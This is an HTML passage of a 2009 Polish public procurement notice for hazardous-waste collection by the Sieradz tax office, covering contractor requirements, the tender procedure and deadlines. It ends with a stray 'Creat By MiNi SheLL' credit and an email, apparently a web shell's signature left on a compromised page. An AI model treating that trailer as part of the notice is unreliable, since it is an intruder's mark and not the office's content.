7.	Oświadczenie, że Wykonawca posiada zezwolenie na prowadzenie działalności w zakresie zbierania i transportu odpadów niebezpiecznych i zobowiązuje się przyjmować od zamawiającego odpady w celu ich przekazania producentowi, importerowi itp. (załącznik nr 4 do SIWZ.
8.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej na sumę ubezpieczenia w wysokości co najmniej  150 000 zł.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ussieradz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Siedzibie Urzędu, pok. 312.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: Siedziba Urzędu, sala obsługi podatnika, stanowisko nr 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com